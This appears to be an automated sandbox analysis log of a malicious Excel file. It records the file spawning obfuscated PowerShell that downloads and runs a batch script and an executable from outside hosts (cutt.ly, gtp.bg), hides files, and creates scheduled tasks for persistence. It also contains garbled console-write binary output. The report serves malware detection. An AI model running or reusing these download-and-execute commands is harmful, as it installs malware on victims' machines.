          Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................e..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .2. . ............................j..U...t.i.m.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................j..U... ./.t. ..........DC.............X.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. ..................................j..U... ./.t. ..........DC.............X.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1......................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................j..U...s.c.h.t..........DC.....................v.......................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................4j..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................4j..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1.......................j..U....................DC.............X.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ./.t. .3. . ...........................dj..U...t.i.m.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................Tj..U... ./.t. ..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................Tj..U... ./.t. ..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1......................4j..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............r.e.g...........d1......................4j..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\.......................................................dj..U...r.e.g............DC.....................T.......................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................d..U......J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............). ......................................d..U......J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\................................DC.....................$d..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............................`{.J.....................k..U....$.J..............C.............(.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J....
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............i.f. ...........`{.J....................$d..U...X%.J.............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...3.". ............d..U...i.f. ............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............(................DC.............................................d1.........v......*........................J....
          Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................d..U...(................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............e.c.h.o.........}..v............................\.......j.......................x.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DC.............H.*.....2.......................
          Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... ..........DC......................e..U....................DC.............x.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........}..v....................................~.........................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1.......................e..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ./.t. .2. . ............................j..U...t.i.m.e..........DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>......................................j..U... ./.t. ..........DC.............X.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...2.". ............d..U...i.f. ............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............e.c.h.o.........}..v............................\.......M.......................x.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DC.............H.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... ..........DC......................e..U....................DC.............x.*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............r.e.g...........}..v............................\......._.........................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................e..U...r.e.g............DC.....................b.......................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................te..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... .........
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...1.". ............d..U...i.f. ............DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............C.m.d...........................................(................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\.......................................................Dd..U...C.m.d............DC.............................................
          Source: C:\Windows\System32\cmd.exe Console Write: ................\...............). ..............DC......................d..U....................DC...............*.............................
          Source: C:\Windows\System32\cmd.exe Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......*.......*.....x.*.....B.......................
          Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ........................................(.P.............,.......................................................................................
          Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................X.......(.P.............................Y.......................................................................
          Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................\...........E.R.R.O.R.:. ...........................N.......................................h.#.............................
          Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................\...........E.R.R.O.(.P.............................T...............................................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Roaming\sp.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: spetsifikatsiya.xls | Virustotal: Detection: 13%
          Source: sp.exe | String found in binary or memory: id-cmc-addExtensions
          Source: sp.exe | String found in binary or memory: set-addPolicy
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknown | Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
          Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
          Source: unknown | Process created: C:\Windows\System32\mode.com mode 18,1
          Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
          Source: unknown | Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: unknown | Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
          Source: unknown | Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
          Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com mode 18,1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
          Source: C:\Users\user\AppData\Roaming\sp.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
          Source: C:\Users\user\AppData\Roaming\sp.exe | Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: C:\Users\user\AppData\Roaming\sp.exe | Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
          Source: C:\Users\user\AppData\Roaming\sp.exe | Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Process created: unknown unknown
          Source: C:\Users\user\AppData\Roaming\sp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2105935712.0000000002740000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122976252.0000000002840000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101619089.00000000028E0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2153192487.00000000029B0000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Unpacked PE file: 31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Unpacked PE file: 37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Unpacked PE file: 31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Unpacked PE file: 37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack
          .NET source code contains potential unpacker
          Source: sp.exe.23.dr, PuppetMaster/PuppetGUI.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: gUuYfpYBjYgU.exe.24.dr, PuppetMaster/PuppetGUI.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 24.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 24.2.sp.exe.bb0000.2.unpack, PuppetMaster/PuppetGUI.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 27.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 27.2.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 28.2.sp.exe.bb0000.2.unpack, PuppetMaster/PuppetGUI.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 28.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Obfuscated command line found
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknown | Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Suspicious powershell command line found
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
